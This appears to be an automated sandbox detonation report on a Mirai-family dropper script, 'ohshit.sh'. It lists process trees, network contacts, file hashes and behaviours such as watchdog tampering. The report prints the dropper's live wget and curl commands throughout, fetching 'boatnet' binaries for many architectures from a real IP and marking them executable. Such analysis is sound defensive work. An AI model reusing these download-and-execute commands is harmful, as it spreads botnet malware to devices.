[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

debian9-mipsbe-20240611-en

Max time kernel

60s

Max time network

64s

Command Line

[/tmp/ohshit.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

Network

Country Destination Domain Proto
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

59s

Max time network

64s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/496/status /tmp/WTF N/A
File opened for reading /proc/1265/status /tmp/WTF N/A
File opened for reading /proc/1065/status /tmp/WTF N/A
File opened for reading /proc/1586/status /tmp/WTF N/A
File opened for reading /proc/1606/status /tmp/WTF N/A
File opened for reading /proc/1597/status /tmp/WTF N/A
File opened for reading /proc/174/status /tmp/WTF N/A
File opened for reading /proc/1596/status /tmp/WTF N/A
File opened for reading /proc/1042/status /tmp/WTF N/A
File opened for reading /proc/426/status /tmp/WTF N/A
File opened for reading /proc/1555/status /tmp/WTF N/A
File opened for reading /proc/1184/status /tmp/WTF N/A
File opened for reading /proc/1566/status /tmp/WTF N/A
File opened for reading /proc/1055/status /tmp/WTF N/A
File opened for reading /proc/1305/status /tmp/WTF N/A
File opened for reading /proc/550/status /tmp/WTF N/A
File opened for reading /proc/568/status /tmp/WTF N/A
File opened for reading /proc/11/status /tmp/WTF N/A
File opened for reading /proc/1116/status /tmp/WTF N/A
File opened for reading /proc/1526/status /tmp/WTF N/A
File opened for reading /proc/1666/status /tmp/WTF N/A
File opened for reading /proc/31/status /tmp/WTF N/A
File opened for reading /proc/137/status /tmp/WTF N/A
File opened for reading /proc/1305/status /tmp/WTF N/A
File opened for reading /proc/21/status /tmp/WTF N/A
File opened for reading /proc/1614/status /tmp/WTF N/A
File opened for reading /proc/13/status /tmp/WTF N/A
File opened for reading /proc/1079/status /tmp/WTF N/A
File opened for reading /proc/467/status /tmp/WTF N/A
File opened for reading /proc/1653/status /tmp/WTF N/A
File opened for reading /proc/1599/status /tmp/WTF N/A
File opened for reading /proc/1526/status /tmp/WTF N/A
File opened for reading /proc/1585/status /tmp/WTF N/A
File opened for reading /proc/1623/status /tmp/WTF N/A
File opened for reading /proc/497/status /tmp/WTF N/A
File opened for reading /proc/1083/status /tmp/WTF N/A
File opened for reading /proc/465/status /tmp/WTF N/A
File opened for reading /proc/1604/status /tmp/WTF N/A
File opened for reading /proc/1660/status /tmp/WTF N/A
File opened for reading /proc/659/status /tmp/WTF N/A
File opened for reading /proc/1132/status /tmp/WTF N/A
File opened for reading /proc/20/status /tmp/WTF N/A
File opened for reading /proc/15/status /tmp/WTF N/A
File opened for reading /proc/25/status /tmp/WTF N/A
File opened for reading /proc/1676/status /tmp/WTF N/A
File opened for reading /proc/497/status /tmp/WTF N/A
File opened for reading /proc/1079/status /tmp/WTF N/A
File opened for reading /proc/1065/status /tmp/WTF N/A
File opened for reading /proc/9/status /tmp/WTF N/A
File opened for reading /proc/1486/status /tmp/WTF N/A
File opened for reading /proc/467/status /tmp/WTF N/A
File opened for reading /proc/1514/status /tmp/WTF N/A
File opened for reading /proc/440/status /tmp/WTF N/A
File opened for reading /proc/1528/status /tmp/WTF N/A
File opened for reading /proc/1637/status /tmp/WTF N/A
File opened for reading /proc/1618/status /tmp/WTF N/A
File opened for reading /proc/19/status /tmp/WTF N/A
File opened for reading /proc/1515/status /tmp/WTF N/A
File opened for reading /proc/1544/status /tmp/WTF N/A
File opened for reading /proc/1065/status /tmp/WTF N/A
File opened for reading /proc/1143/status /tmp/WTF N/A
File opened for reading /proc/323/status /tmp/WTF N/A
File opened for reading /proc/1620/status /tmp/WTF N/A
File opened for reading /proc/18/status /tmp/WTF N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

